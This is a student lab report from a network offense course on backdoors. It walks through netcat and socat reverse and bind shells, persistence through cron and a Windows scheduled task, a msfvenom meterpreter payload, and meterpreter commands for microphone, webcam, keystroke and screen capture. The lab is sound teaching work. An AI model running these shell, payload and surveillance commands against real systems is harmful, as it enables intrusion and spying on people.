Exp2 后门原理与实践

实验内容

一、基础问题回答

1.例举你能想到的一个后门进入到你系统中的可能方式?

答:通过访问钓鱼网站,无意下载了一些图片或是文件。而这个图片或文件中携带后门。

2.例举你知道的后门如何启动起来(win及linux)的方式?

答:对于Windows来说:

  • 用户执行了带有后门的可执行文件

  • 开机自启动技术

  • win的定时服务

对于linux来说:

  • cron设置在一个指定的时间启动后门

  • 通过命令行执行了一个捆绑有后门的可执行文件

3.Meterpreter有哪些给你印象深刻的功能?

答:生成一个后门的可执行文件,并将其植入被控主机;可以对被控主机进行屏幕截图、击键记录、录音以及提权等操作。

4.如何发现自己的系统有没有被安装后门?

答:(1)安装杀毒软件,可以进行实时监控;

(2)检测网络连接,查看是否有IP与本机连接。

二、实验步骤

实验点一:使用netcat获取主机操作Shell,cron启动

Mac获得Linux Shell

  • 首先查看主控端Mac的IP地址为172.16.31.1

  • 主控端Mac运行指令如下,5233是nc监听的端口号。

nc -l 5233
  • 受控端/客户机运行指令如下。其中 IP地址为 MAC主机的IP。5233就是上一步中的端口号。
bash -i >& /dev/tcp/172.16.31.1/5233 0>&1

  • MAC主机会显示Linux的命令行提示符,并运行任何Linux指令。

Linux获得Mac Shell

  • Linux启动监听
nc -l -p 5233
  • Mac连接Linux
bash -i >& /dev/tcp/172.16.31.134/5233 0>&1

  • Linux获取Mac Shell

cron启动

  • Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。详细说明可以"man cron"。

  • crontab指令增加一条定时任务,-e表示编辑。

  • 由于是第一次编辑,所以选择"3"那个编辑器,并在最后一行添加。修改后表示在每个小时的第55分钟执行后面那条指令。

  • 保存、退出后配置即生效。可以通过crontab -l来查看,-l表示list。

  • 每个小时到了55分,上面的那条指令就会执行。

  • 如果在另一台主机172.16.31.1让nc侦听在5233端口,那到了55分就会有获得一个shell。这是一个简单的反弹式后门。

实验点二:使用socat获取主机操作Shell, 任务计划启动

  • Netcat++,是一种超级netcat工具。在Windows中下载解压即可使用。通过man socat可知其使用方法,见下图。

  • 首先在win7中打开控制面板搜索管理工具

  • 依次任务计划程序->创建任务

  • 点击触发器,选择新建,然后将开始任务设置为工作站锁定时。

  • 点击常规,输入名称。

  • 再点击操作,点击新建,程序或脚本中选择socat.exe路径,在添加参数一栏中写tcp-listen:5233 exec:cmd.exe,pty,stderr(作用是把cmd.exe绑定到端口5233,同时把cmd.exe的stderr重定向到stdout上),点击确定保存设置。

  • 找到刚刚创建的20165233任务,右键点击运行,此时会弹出taskeng.exe表明运行成功。

  • 在Kali中输入socat - tcp:10.211.55.3:5233命令,可以成功得到一个cmd shell。

实验点三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

  • 在Kali上执行指令(此处的IP地址为Kali的)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.31.134 LPORT=5233 -f exe > 20165233_backdoor.exe

  • 在Windows下执行
ncat.exe -l 5233 > 20165233_backdoor.exe

或者

ncat.exe -lv 5233 > 20165233_backdoor.exe

通过-lv选项看到当前的连接状态,连接成功见下图。

  • 在Kali中执行(这里的IP为被控主机IP,即WindowsIP)
nc 10.211.55.3 5233 < 20165233_backdoor.exe

  • 下图为传送成功的可执行文件20165233_backdoor.exe

  • 在Kali上使用msfconsole命令进入msf控制台。

  • 使用监听模块,设置payload
use exploit/multi/handler
  • 使用和生成后门程序时相同的payload
set payload windows/meterpreter/reverse_tcp
  • IP地址与端口号均与生成后门程序20165233_backdoor.exe时指定的相同
set LHOST 172.16.31.134

set LPORT 5233

  • 通过exploit开启监听。

  • 运行Windows下的后门程序

  • 在Kali上便得到了Windows的shell,通过dir可查看与该后门程序所在的文件夹下的其他文件及其属性。

实验点四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

  • 通过record_mic命令可以获取Windows的音频。

  • 通过webcam_snap命令可以获取Windows的摄像头。(PS:这里摄像头截图是黑色的,是因为很早以前我的Mac摄像头就被我贴住了,防止偷窥,嘻嘻)

  • 通过keyscan_start命令开始记录下击键的过程,通过keyscan_dump命令读取击键记录。

  • 通过screenshot命令对被控主机的屏幕进行捕捉。

  • 通过getuid命令查看当前用户,再通过getsystem命令进行提权。但是Mac本身不允许...

实验中遇到的问题

就是上一步遇到的问题...无法进行提权。

实验收获与感想

这次实验还蛮有意思的,就是在互相进行监听时,对于反弹后门所使用的IP地址有些混乱,必须冷静的推一下...在MSF meterpreter那里,通过各种命令对被控主机进行一系列的监听,"偷窥"之类的操作,不禁让人心里打了寒颤,黑客可以很轻易的获取到全世界各地的摄像头...所以也很早以前就把Mac的摄像头贴起来了。

通过这次实验,也透彻的了解了后门的原理,但是实际黑客的后门是更加隐蔽和难以发现的。对于后门的发现与检测也获得了一定的方法,比起以前只知道杀毒软件和防火墙要高级许多。

2018-2019-2 《网络对抗技术》Exp2 后门原理与实践 Week4 20165233的更多相关文章

  1. 2019-2020-2 20175226 王鹏雲 网络对抗技术 Exp2 后门原理与实践

    2019-2020-2 20175226 王鹏雲 网络对抗技术 Exp2 后门原理与实践 实验内容 使用netcat获取主机操作Shell,cron启动: 使用socat获取主机操作Shell, 任务 ...

  2. 20155326刘美岑 《网络对抗》Exp2 后门原理与实践

    20155326刘美岑 <网络对抗>Exp2 后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启 ...

  3. 20155320《网络对抗》Exp2 后门原理与实践

    20155320<网络对抗>Exp2 后门原理与实践 [实验内容] (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, ...

  4. 20155324《网络对抗》Exp2 后门原理与实践

    20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...

  5. 20155208徐子涵《网络对抗》Exp2 后门原理与实践

    20155208徐子涵<网络对抗>Exp2 后门原理与实践 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 答:当我们在非官方网站上下载软件时,后门极有可能会进入我们 ...

  6. 20145236《网络对抗》Exp2 后门原理与实践

    20145236<网络对抗>Exp2 后门原理与实践 目录: 一.基础问题回答 二.常用后门工具实践 2.1 Windows获得Linux Shell 2.2 Linux获得Windows ...

  7. 20155202 张旭《网络对抗》Exp2 后门原理与实践

    20155202 张旭<网络对抗>Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 捆绑在软件中 注入在可执行文件里 注入在office文件的宏里面 ...

  8. 20155218《网络对抗》Exp2 后门原理与实践

    20155218<网络对抗>Exp2 后门原理与实践 常用后门工具实践 1.Windows获得Linux Shell: 在Windows下,先使用ipconfig指令查看本机IP,使用nc ...

  9. 20155227《网络对抗》Exp2 后门原理与实践

    20155227<网络对抗>Exp2 后门原理与实践 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 在非官方网站下载软件时,后门很可能被捆绑在软件中. 攻击者利用欺 ...

  10. 20155232《网络对抗》Exp2 后门原理与实践

    20155232<网络对抗>Exp2 后门原理与实践 问题回答 1.例举你能想到的一个后门进入到你系统中的可能方式? 通过网页上弹出来的软件自动安装 2.例举你知道的后门如何启动起来(wi ...

随机推荐

  1. caffe测试mnist问题-error while loading shared libraries

    问题描述 build/examples/mnist/convert_mnist_data.bin: error while loading shared libraries: libcudart.so ...

  2. TensorRT简介-转载

    前言 NVIDIA TensorRT是一种高性能神经网络推理(Inference)引擎,用于在生产环境中部署深度学习应用程序,应用有 图像分类.分割和目标检测等,可提供最大的推理吞吐量和效率.Tens ...

  3. 8个iPhone防盗秘籍 为手机和资料安全保驾护航

    最近发现用x手机的朋友越来越多,今天一个朋友手机被偷,万分焦急,失财事小,电话里很多手机号码等重要信息都无法找回.为了让大家尽量安全使用自己的iPhone或苹果产品,哪怕丢失后也有最大的可能性找回,特 ...

  4. beautiful number 数位DP codeforces 55D

    题目链接: http://codeforces.com/problemset/problem/55/D 数位DP 题目描述: 一个数能被它每位上的数字整除(0除外),那么它就是beautiful nu ...

  5. 【HAOI2010】订货

    可以DP也可以是费用流,然而被我用非常简单的DP破了[开心] 原题: 某公司估计市场在第i个月对某产品的需求量为Ui,已知在第i月该产品的订货单价为di,上个月月底未销完的单位产品要付存贮费用m,假定 ...

  6. test20180907 day1

    T1 256MB,1Sec T2 512MB,3Sec T3 512MB,1Sec 总分:150 试题一 餐馆 题目背景 铜企鹅是企鹅餐馆的老板,他正在计划如何使得自己本年度收益增加. 题目描述 共有 ...

  7. window.open 和 location.href 区别

    window.open():可以在一个网站上打开另外的一个网站的地址 window.location():只能在一个网站中打开本网站的网页

  8. hadoop技术入门学习之发行版选择

    经常会看到这样的问题:零基础学习hadoop难不难?有的人回答说:零基础学习hadoop,没有想象的那么难,也没有想象的那么容易.看到这样的答案不免觉得有些尴尬,这个问题算是白问了,因为这个回答似乎什 ...

  9. 【appium】根据class_name定位元素

    目前没有尝试成功,等成功后补充 class_name=class可以通过UIAutomatorViewer获得.

  10. sublime text3安装 mac os汉化/常用模块

    sublime text介绍: Sublime Text 是一个代码编辑器(Sublime Text 2是收费软件,但可以无限期试用),也是HTML和散文先进的文本编辑器.Sublime Text是由 ...